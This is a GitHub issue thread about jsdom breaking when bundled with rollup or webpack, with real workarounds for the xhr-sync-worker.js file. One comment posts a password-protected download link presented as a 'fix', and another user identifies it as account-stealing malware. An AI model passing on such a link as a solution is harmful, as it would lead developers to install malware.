### ISSUE TITLE
Fails to bundle with rollup

### ISSUE THREAD

**Issue by Dominic-Marcelino** [jsdom/jsdom#3775]
### Basic info:
Hi everyone,
I try to bundle jsdom into one of our projects. Initially I ran into some issues as we tried to bundle into esm, which seems like a known problem (#2475)

After bundling to cjs, the bundling-process works but running it fails due to a dynamic import: 
https://github.com/jsdom/jsdom/blob/c53efc81e75f38a0558fbf3ed75d30b78b4c4898/lib/jsdom/living/xhr/XMLHttpRequest-impl.js#L31

Is there any known (good) solution?

- **Node.js version:** v18.19.1
- **jsdom version:** 25.0.0

-- --

### Minimal reproduction

https://stackblitz.com/edit/stackblitz-starters-byjggq?file=rollup.config.mjs

> [!IMPORTANT]  
> This won't run on stackblitz, as "fetch" will fail due to CORS in the browser. Detailed instructions below

## Test-Instructions
- Download the project
- Install dependencies: `pnpm i`
- Bundle: `pnpm build`
- Try to run it: `node dist/index.js`
--> Error: `Error: Cannot find module './xhr-sync-worker.js'`

## Workaround
- go to to `rollup.config.mjs`
- Include the copy-plugin
- bundle again
- Run again
--> This works, but isn't a really nice workaround.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dominic-Marcelino** [comment]
> Download https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file password: changeme In the installer menu, select "gcc."

What is this and how is it related to the issue?

**Comment by caineblood** [comment]
that is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed.

**Comment by domenic** [comment]
jsdom does not support being bundled; it is meant to run natively in Node.js.

**Comment by blackcid** [comment]
then why this?
https://github.com/jsdom/jsdom#running-jsdom-inside-a-web-browser

**Comment by domenic** [comment]
That link goes nowhere.

**Comment by rwalle** [comment]
I recently ran into this issues while trying to bundle jsdom for a non-`node_modules` based environment. There are some discussions including solutions (https://github.com/jsdom/jsdom/issues/3511, https://github.com/jsdom/jsdom/issues/3591, https://github.com/evanw/esbuild/issues/1311), but they seem incomplete and confusing. Hope this comment helps clarify the situation a bit better.

My understanding is follows:

* the actual file `xhr-sync-worker.js` (instead of as a JavaScript module) is used at runtime by the `spawnSync` call here: https://github.com/jsdom/jsdom/blob/04541b377d9949d6ab56866760b7883a23db0577/lib/jsdom/living/xhr/XMLHttpRequest-impl.js#L587-L589. This is reachable if you have a call like `xhr.open("GET", url, false)` which forces synchronous xhr.
* `xhr-sync-worker.js` requires the entire JSDOM library

Therefore, after bundling, there needs to be at least two JS files -- one for the "real" JSDOM library entry point, the other for a file that can be passed to the `spawnSync` call that runs the code in  `xhr-sync-worker.js` and loads the full JSDOM in a child process.

Here is my solution to make it work with webpack. I assume you can do something similar with other bundlers:

1. There will be two files in the `dist` folder next to each other
2. replace
https://github.com/jsdom/jsdom/blob/04541b377d9949d6ab56866760b7883a23db0577/lib/jsdom/living/xhr/XMLHttpRequest-impl.js#L31
with
```js
const syncWorkerFile = path.join(__dirname, "./xhr-sync-worker.js");
```
so that `spawnSync` knows where to find this file. `require.resolve` would be replaced with either `true` or nothing by webpack -- we don't want that.
3. setting up two entry points and two target files -- in webpack config
```
entry: {
    jsdom: 'path/to/lib/api.js',
    'xhr-sync-worker': 'path/to/lib/jsdom/living/xhr/xhr-sync-worker.js'
}
```
4. you should be good to go with this. But this will result in two giant bundled files, when the entire `lib/api` chunk can be shared. You can add this to share the code:
```
optimization: {
    minimize: false,
    splitChunks: {
        chunks: 'all',
    }
}
```
Now you should have two tiny `jsdom.js` and `xhr-sync-worker.js` files, plus two or more chunk files.

(I tried using `dependOn` in the entry point section, but that failed for some strange reasons)

And here is a smoke test to ensure your packaging is done properly, using node test runner:

```js
const test = require('node:test');
const assert = require('node:assert');
const { JSDOM } = require("path/to/dist/jsdom");

test('XMLHttpRequest Test', async (t) => {
    // Create a new JSDOM instance
    const dom = new JSDOM(``, {
        url: "https://example.com",
        resources: "usable"
    });

    // Access the XMLHttpRequest from the JSDOM window
    const xhr = new dom.window.XMLHttpRequest();

    // Set up the XMLHttpRequest
    xhr.open("GET", "https://jsonplaceholder.typicode.com/todos/1", false);

    // Create a promise to handle the request
    const requestPromise = new Promise((resolve, reject) => {
        xhr.onload = function () {
            resolve(xhr.responseText);
        };

        xhr.onerror = function () {
            reject(new Error("An error occurred during the request."));
        };
    });

    // Send the request
    xhr.send();

    const responseText = await requestPromise;
    const responseData = JSON.parse(responseText);

    assert.strictEqual(responseData.id, 1, 'Response should contain the expected data');
});
```

**Comment by rwalle** [comment]
@Dominic-Marcelino I believe using `copy-plugin` is the correct solution here (working as intended)

**Comment by julbd** [comment]
@Dominic-Marcelino Hello ! Did you have this issue with a directus extension ? Can you share your implementation of the solution ? Thanks !

**Comment by Dominic-Marcelino** [comment]
> [@Dominic-Marcelino](https://github.com/Dominic-Marcelino) Hello ! Did you have this issue with a directus extension ? Can you share your implementation of the solution ? Thanks !

You can solve this by installing jsdom as an external dependency in your extension and then installing it in the main project.

**Comment by julbd** [comment]
I expected way more complex than this. Thank you.
